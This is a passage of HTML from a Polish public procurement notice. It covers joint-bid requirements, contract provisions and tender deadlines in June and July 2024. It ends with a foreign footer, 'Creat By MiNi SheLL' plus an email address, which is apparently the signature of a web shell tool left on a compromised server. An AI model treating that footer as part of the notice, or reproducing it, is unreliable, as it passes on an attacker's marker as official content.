pełnomocnictwo z uwzględnieniem <br/>wymogów wskazanych w Rozdziale IV niniejszej SWZ;<br/>c. przed zawarciem umowy o zamówienie publiczne Zamawiający wymaga <br/>przedstawienia mu kopii umowy regulującej współpracę Wykonawców składających <br/>ofertę wspólną.<br/>2. Oferta wspólna składana np. przez konsorcjum lub spółkę cywilną musi zawierać dokumenty<br/>wskazane w Rozdziale IV niniejszej SWZ (Załącznik nr 3) oddzielnie dla każdego z podmiotów <br/>(Wykonawców) ubiegających się wspólnie o zamówienie w celu potwierdzenia, że nie podlega <br/>wykluczeniu z postępowania na podstawie art. 108 ust. 1 uPzp.<br/>3. Wykonawcy wspólnie ubiegający się o zamówienie:<br/>a. ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie <br/>zobowiązania;<br/>b. zobowiązani są ustanowić pełnomocnika do reprezentowania ich w niniejszym <br/>postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w <br/>postępowaniu i zawarcia umowy w sprawie zamówienia;<br/>c. pełnomocnictwo musi wynikać z umowy lub innej czynności prawnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-25 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-25 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com